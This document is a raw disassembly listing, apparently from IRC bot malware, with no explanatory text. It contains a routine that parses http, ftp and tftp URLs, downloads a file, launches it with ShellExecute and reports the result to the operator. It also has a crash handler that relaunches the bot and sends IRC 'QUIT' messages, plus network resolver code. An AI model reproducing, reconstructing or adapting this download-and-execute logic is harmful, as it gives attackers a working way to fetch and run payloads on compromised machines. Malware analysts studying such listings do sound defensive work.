var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_6D5 = byte ptr -6D5h
var_6D4 = byte ptr -6D4h
var_6CC = dword ptr -6CCh
var_6C8 = dword ptr -6C8h
var_6C4 = dword ptr -6C4h
var_6C0 = dword ptr -6C0h
var_6BC = byte ptr -6BCh
var_6BB = byte ptr -6BBh
var_63C = dword ptr -63Ch
var_638 = byte ptr -638h
var_637 = byte ptr -637h
var_632 = byte ptr -632h
var_631 = byte ptr -631h
var_534 = byte ptr -534h
var_430 = byte ptr -430h
var_2A8 = byte ptr -2A8h
var_2A7 = byte ptr -2A7h
var_2A6 = byte ptr -2A6h
var_2A3 = byte ptr -2A3h
var_296 = byte ptr -296h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = byte ptr -284h
var_283 = byte ptr -283h
var_204 = byte ptr -204h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 804h
push edi
push 3AFh
push [ebp+arg_0]
lea eax, [ebp+var_63C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_7DC]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
and [ebp+var_288], 0
mov [ebp+var_28C], 1
and [ebp+var_6CC], 0
mov al, byte_41DE30
mov [ebp+var_284], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_283]
rep stosd
stosw
stosb
mov al, byte_41DE30
mov [ebp+var_6BC], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_6BB]
rep stosd
stosw
stosb
and [ebp+var_6C8], 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_4185CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 14h
push 7
push offset dword_4185C4
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_402B93
push 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_631]
push eax
call dword_417060 ; CopyFileA
test eax, eax
jnz short loc_402B8E
call dword_417064 ; RtlGetLastWin32Error
cmp eax, 20h
jnz short loc_402B58
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41858C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_402B7B
; ---------------------------------------------------------------------------
loc_402B58: ; CODE XREF: sub_402A32+FF�j
lea eax, [ebp+var_631]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41855C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_402B7B: ; CODE XREF: sub_402A32+124�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402B8E: ; CODE XREF: sub_402A32+F4�j
jmp loc_403256
; ---------------------------------------------------------------------------
loc_402B93: ; CODE XREF: sub_402A32+D6�j
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402BB5
; ---------------------------------------------------------------------------
loc_402BA8: ; CODE XREF: sub_402A32:loc_402CD8�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402BB5: ; CODE XREF: sub_402A32+174�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402CDD
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 3Ah
jnz loc_402CD8
mov [ebp+var_7E0], 1
jmp short loc_402BF2
; ---------------------------------------------------------------------------
loc_402BE5: ; CODE XREF: sub_402A32:loc_402CD3�j
mov eax, [ebp+var_7E0]
inc eax
mov [ebp+var_7E0], eax
loc_402BF2: ; CODE XREF: sub_402A32+1B1�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
test eax, eax
jz short loc_402C23
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 2Fh
jnz short loc_402C7A
loc_402C23: ; CODE XREF: sub_402A32+1D6�j
mov eax, [ebp+var_7E0]
and [ebp+eax+var_6D5], 0
lea eax, [ebp+var_6D4]
push eax
call sub_40422A
pop ecx
test eax, eax
jz short loc_402C75
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
add eax, [ebp+var_7E0]
push eax
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6C8], 1
loc_402C75: ; CODE XREF: sub_402A32+20E�j
jmp loc_403251
; ---------------------------------------------------------------------------
loc_402C7A: ; CODE XREF: sub_402A32+1EF�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 30h
jl short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 39h
jg short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
mov ecx, [ebp+var_7E0]
mov al, [ebp+eax+var_638]
mov [ebp+ecx+var_6D5], al
jmp short loc_402CD3
; ---------------------------------------------------------------------------
loc_402CCE: ; CODE XREF: sub_402A32+25F�j
; sub_402A32+278�j
jmp loc_40324C
; ---------------------------------------------------------------------------
loc_402CD3: ; CODE XREF: sub_402A32+29A�j
jmp loc_402BE5
; ---------------------------------------------------------------------------
loc_402CD8: ; CODE XREF: sub_402A32+1A1�j
jmp loc_402BA8
; ---------------------------------------------------------------------------
loc_402CDD: ; CODE XREF: sub_402A32+18A�j
; sub_402A32:loc_40324C�j ...
push 7
push offset aHttp ; "http://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402D37
cmp [ebp+var_6C8], 0
jnz short loc_402D13
push offset a80 ; "80"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_402D13: ; CODE XREF: sub_402A32+2CC�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6CC], 1
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: sub_402A32+2C3�j
push 6
push offset aFtp ; "ftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402DB7
cmp [ebp+var_6C8], 0
jnz short loc_402D6D
push offset a21 ; "21"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_402D6D: ; CODE XREF: sub_402A32+326�j
lea eax, [ebp+var_632]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6CC], 2
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_284]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_6BC]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402DB7: ; CODE XREF: sub_402A32+31D�j
push 7
push offset aTftp ; "tftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402E0E
cmp [ebp+var_6C8], 0
jnz short loc_402DED
push offset a69 ; "69"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_402DED: ; CODE XREF: sub_402A32+3A6�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6CC], 3
jmp short loc_402E3D
; ---------------------------------------------------------------------------
loc_402E0E: ; CODE XREF: sub_402A32+39D�j
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_418500
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402E3D: ; CODE XREF: sub_402A32+300�j
; sub_402A32+380�j ...
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402E5F
; ---------------------------------------------------------------------------
loc_402E52: ; CODE XREF: sub_402A32:loc_402F11�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402E5F: ; CODE XREF: sub_402A32+41E�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402F16
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 40h
jnz loc_402F11
mov eax, [ebp+var_6C0]
and [ebp+eax+var_638], 0
push offset asc_4184FC ; ":"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_7E4], eax
cmp [ebp+var_7E4], 0
jz short loc_402ED8
mov eax, [ebp+var_7E4]
and byte ptr [eax], 0
push 80h
mov eax, [ebp+var_7E4]
inc eax
push eax
lea eax, [ebp+var_6BC]
push eax
call sub_407A56
add esp, 0Ch
loc_402ED8: ; CODE XREF: sub_402A32+47F�j
push 80h
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_284]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_637]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_402F16
; ---------------------------------------------------------------------------
loc_402F11: ; CODE XREF: sub_402A32+44B�j
jmp loc_402E52
; ---------------------------------------------------------------------------
loc_402F16: ; CODE XREF: sub_402A32+434�j
; sub_402A32+4DD�j
push offset asc_4184F8 ; "/"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_288], eax
cmp [ebp+var_288], 0
jnz short loc_402F67
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_4184CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402F67: ; CODE XREF: sub_402A32+504�j
mov eax, [ebp+var_288]
inc eax
push eax
lea eax, [ebp+var_204]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_288]
and byte ptr [eax], 0
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp-6D8h], eax
and [ebp+var_6C4], 0
cmp [ebp+var_6CC], 1
jnz short loc_403009
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402698
add esp, 24h
mov [ebp+var_28C], eax
loc_403009: ; CODE XREF: sub_402A32+582�j
cmp [ebp+var_6CC], 2
jnz short loc_403065
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402A24
add esp, 24h
mov [ebp+var_28C], eax
loc_403065: ; CODE XREF: sub_402A32+5DE�j
cmp [ebp+var_6CC], 3
jnz short loc_4030B3
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
call sub_402A2B
add esp, 1Ch
mov [ebp+var_28C], eax
loc_4030B3: ; CODE XREF: sub_402A32+63A�j
; sub_402A32:loc_403256�j
cmp [ebp+var_28C], 1
jnz loc_403219
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4030D7
mov [ebp+var_7EC], offset dword_4184C0
jmp short loc_403104
; ---------------------------------------------------------------------------
loc_4030D7: ; CODE XREF: sub_402A32+697�j
movsx eax, [ebp+var_2A6]
test eax, eax
jz short loc_4030EE
mov [ebp+var_7F0], offset dword_4184B4
jmp short loc_4030F8
; ---------------------------------------------------------------------------
loc_4030EE: ; CODE XREF: sub_402A32+6AE�j
mov [ebp+var_7F0], offset byte_41DE30
loc_4030F8: ; CODE XREF: sub_402A32+6BA�j
mov eax, [ebp+var_7F0]
mov [ebp+var_7EC], eax
loc_403104: ; CODE XREF: sub_402A32+6A3�j
push [ebp+var_7EC]
mov eax, [ebp+var_6C4]
shr eax, 0Ah
mov dword ptr [ebp+var_7F8], eax
and dword ptr [ebp+var_7F8+4], 0
fild [ebp+var_7F8]
fstp [ebp+var_7FC]
call sub_416B64 ; clock
sub eax, [ebp-6D8h]
mov dword ptr [ebp+var_804], eax
and dword ptr [ebp+var_804+4], 0
fild [ebp+var_804]
fdiv flt_417270
fdivr [ebp+var_7FC]
push ecx
push ecx
fstp [esp+814h+var_814]
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41846C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_2A7]
test eax, eax
jz short loc_403198
lea eax, [ebp+var_534]
push eax
call dword_4170AC ; DeleteFileA
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_403198: ; CODE XREF: sub_402A32+755�j
movsx eax, [ebp+var_2A6]
test eax, eax
jnz short loc_4031AE
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_403217
loc_4031AE: ; CODE XREF: sub_402A32+76F�j
movsx eax, [ebp+var_2A3]
neg eax
sbb eax, eax
inc eax
push eax
push 0
push 0
lea eax, [ebp+var_534]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0
mov [ebp+var_7E8], eax
cmp [ebp+var_7E8], 20h
jbe short loc_4031F4
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4031F2
call sub_407148
loc_4031F2: ; CODE XREF: sub_402A32+7B9�j
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_4031F4: ; CODE XREF: sub_402A32+7AE�j
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418444
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_403217: ; CODE XREF: sub_402A32+764�j
; sub_402A32+77A�j ...
jmp short loc_40323C
; ---------------------------------------------------------------------------
loc_403219: ; CODE XREF: sub_402A32+688�j
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418414
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_40323C: ; CODE XREF: sub_402A32:loc_403217�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_40325B
; ---------------------------------------------------------------------------
loc_40324C: ; CODE XREF: sub_402A32:loc_402CCE�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403251: ; CODE XREF: sub_402A32:loc_402C75�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403256: ; CODE XREF: sub_402A32:loc_402B8E�j
jmp loc_4030B3
; ---------------------------------------------------------------------------
loc_40325B: ; CODE XREF: sub_402A32+157�j
; sub_402A32+406�j ...
pop edi
leave
retn 4
sub_402A32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403260 proc near ; CODE XREF: sub_40A9CF+959�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_4], 0
jnz short loc_403271
jmp locret_403329
; ---------------------------------------------------------------------------
loc_403271: ; CODE XREF: sub_403260+A�j
push 3AFh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_40328A
jmp locret_403329
; ---------------------------------------------------------------------------
loc_40328A: ; CODE XREF: sub_403260+23�j
push 8
push 7Ah
push 61h
push 4
lea eax, [ebp+var_10]
push eax
call sub_410501
add esp, 14h
and [ebp+eax+var_10], 0
push offset dword_418620
lea eax, [ebp+var_10]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jnz short loc_4032BF
lea eax, [ebp+var_10]
mov [ebp+arg_8], eax
loc_4032BF: ; CODE XREF: sub_403260+57�j
push 104h
push [ebp+arg_4]
mov eax, [ebp+var_14]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_14]
add eax, 108h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_14]
add eax, 20Ch
push eax
call sub_405F67
pop ecx
pop ecx
mov eax, [ebp+var_14]
add eax, 108h
push eax
mov eax, [ebp+var_14]
add eax, 4
push eax
push offset dword_4185FC
push 0
push [ebp+var_14]
push offset sub_402A32
call sub_4095A4
add esp, 18h
locret_403329: ; CODE XREF: sub_403260+C�j
; sub_403260+25�j
leave
retn
sub_403260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40332B proc near ; CODE XREF: sub_4093B6+A0�p
; sub_4094E6+9B�p ...
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 114h
push 1
push offset dword_41DE3C
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp dword_41DE38, 0
jz loc_4034D9
mov [ebp+var_8], offset aException_othe ; "EXCEPTION_OTHER"
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_110], eax
cmp [ebp+var_110], 0C0000025h
ja short loc_4033A4
cmp [ebp+var_110], 0C0000025h
jz short loc_4033FA
cmp [ebp+var_110], 80000003h
jz short loc_4033DF
cmp [ebp+var_110], 0C0000005h
jz short loc_4033D6
cmp [ebp+var_110], 0C000001Dh
jz short loc_4033E8
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033A4: ; CODE XREF: sub_40332B+45�j
cmp [ebp+var_110], 0C000008Dh
jb short loc_403413
cmp [ebp+var_110], 0C0000093h
jbe short loc_40340C
cmp [ebp+var_110], 0C0000094h
jz short loc_4033F1
cmp [ebp+var_110], 0C00000FDh
jz short loc_403403
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033D6: ; CODE XREF: sub_40332B+69�j
mov [ebp+var_8], offset aException_acce ; "EXCEPTION_ACCESS_VIOLATION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: sub_40332B+5D�j
mov [ebp+var_8], offset aException_brea ; "EXCEPTION_BREAKPOINT"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033E8: ; CODE XREF: sub_40332B+75�j
mov [ebp+var_8], offset aException_ille ; "EXCEPTION_ILLEGAL_INSTRUCTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033F1: ; CODE XREF: sub_40332B+9B�j
mov [ebp+var_8], offset aException_int_ ; "EXCEPTION_INT_DIVIDE_BY_ZERO"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033FA: ; CODE XREF: sub_40332B+51�j
mov [ebp+var_8], offset aException_nonc ; "EXCEPTION_NONCONTINUABLE_EXCEPTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_403403: ; CODE XREF: sub_40332B+A7�j
mov [ebp+var_8], offset aException_stac ; "EXCEPTION_STACK_OVERFLOW"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_40340C: ; CODE XREF: sub_40332B+8F�j
mov [ebp+var_8], offset aException_flt ; "EXCEPTION_FLT"
loc_403413: ; CODE XREF: sub_40332B+77�j
; sub_40332B+83�j ...
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_40342A
mov [ebp+var_114], offset aRestarting ; "Restarting"
jmp short loc_403434
; ---------------------------------------------------------------------------
loc_40342A: ; CODE XREF: sub_40332B+F1�j
mov [ebp+var_114], offset aContinuing ; "Continuing"
loc_403434: ; CODE XREF: sub_40332B+FD�j
push [ebp+var_114]
push [ebp+var_8]
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
mov eax, [ebp+var_4]
inc eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41864C
push offset dword_41DAB4
call sub_40D4AB
add esp, 48h
loc_4034D9: ; CODE XREF: sub_40332B+21�j
mov eax, [ebp+var_4]
inc eax
cmp eax, 64h
jz short loc_4034ED
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_403558
loc_4034ED: ; CODE XREF: sub_40332B+1B5�j
push 104h
lea eax, [ebp+var_10C]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
test eax, eax
jz short loc_403545
push 0
push 0
push 0
lea eax, [ebp+var_10C]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0
cmp eax, 20h
ja short loc_403538
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp short loc_403543
; ---------------------------------------------------------------------------
loc_403538: ; CODE XREF: sub_40332B+1FE�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403543: ; CODE XREF: sub_40332B+20B�j
jmp short loc_403550
; ---------------------------------------------------------------------------
loc_403545: ; CODE XREF: sub_40332B+1DF�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403550: ; CODE XREF: sub_40332B:loc_403543�j
push 0
call dword_41705C ; ExitProcess
loc_403558: ; CODE XREF: sub_40332B+1C0�j
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 80000003h
jnz short loc_403583
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov eax, [eax+0B8h]
inc eax
mov ecx, [ebp+arg_0]
mov ecx, [ecx+4]
mov [ecx+0B8h], eax
or eax, 0FFFFFFFFh
jmp short locret_403586
; ---------------------------------------------------------------------------
loc_403583: ; CODE XREF: sub_40332B+238�j
push 1
pop eax
locret_403586: ; CODE XREF: sub_40332B+256�j
leave
retn
sub_40332B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403588 proc near ; DATA XREF: sub_403BD3:loc_403D85�o
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 48h
cmp [ebp+arg_8], 0
jz short loc_4035E2
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 0
jz short loc_4035BB
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 2
jz short loc_4035BB
push 273Fh
call dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035BB: ; CODE XREF: sub_403588+13�j
; sub_403588+1C�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 1
jz short loc_4035E2
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 2
jz short loc_4035E2
push 273Ch
call dword_417234 ; WSASetLastError
mov eax, 273Ch
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035E2: ; CODE XREF: sub_403588+A�j
; sub_403588+3A�j ...
cmp [ebp+arg_0], 0
jnz loc_4036D6
push 30h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jnz short loc_40360D
push 8
call dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40360D: ; CODE XREF: sub_403588+73�j
push 30h
push 0
push [ebp+var_34]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_30]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_30], 2
cmp [ebp+arg_4], 0
jz short loc_40364C
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; ntohs
mov [ebp+var_2E], ax
loc_40364C: ; CODE XREF: sub_403588+AE�j
mov eax, [ebp+var_34]
mov dword ptr [eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_403667
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_38], eax
jmp short loc_40366E
; ---------------------------------------------------------------------------
loc_403667: ; CODE XREF: sub_403588+D2�j
mov [ebp+var_38], 1
loc_40366E: ; CODE XREF: sub_403588+DD�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
mov [eax+8], ecx
cmp [ebp+arg_8], 0
jz short loc_403688
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_3C], eax
jmp short loc_40368F
; ---------------------------------------------------------------------------
loc_403688: ; CODE XREF: sub_403588+F3�j
mov [ebp+var_3C], 6
loc_40368F: ; CODE XREF: sub_403588+FE�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_3C]
mov [eax+0Ch], ecx
mov eax, [ebp+var_34]
mov dword ptr [eax+10h], 10h
mov eax, [ebp+var_34]
add eax, 20h
mov ecx, [ebp+var_34]
mov [ecx+18h], eax
and [ebp+var_2C], 0
push 10h
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_34]
add eax, 20h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
mov [eax], ecx
xor eax, eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036D6: ; CODE XREF: sub_403588+5E�j
push [ebp+arg_0]
call dword_41723C ; gethostbyname
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4036F2
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036F2: ; CODE XREF: sub_403588+15E�j
and [ebp+var_20], 0
jmp short loc_4036FF
; ---------------------------------------------------------------------------
loc_4036F8: ; CODE XREF: sub_403588+18C�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4036FF: ; CODE XREF: sub_403588+16E�j
cmp [ebp+var_14], 0
jz short loc_403716
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_20]
cmp dword ptr [eax+ecx*4], 0
jz short loc_403716
jmp short loc_4036F8
; ---------------------------------------------------------------------------
loc_403716: ; CODE XREF: sub_403588+17B�j
; sub_403588+18A�j
cmp [ebp+var_20], 0
jnz short loc_403726
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_403726: ; CODE XREF: sub_403588+192�j
mov eax, [ebp+var_20]
imul eax, 30h
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_40374C
push 8
call dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40374C: ; CODE XREF: sub_403588+1B2�j
mov eax, [ebp+var_20]
imul eax, 30h
push eax
push 0
push [ebp+var_1C]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_10], 2
cmp [ebp+arg_4], 0
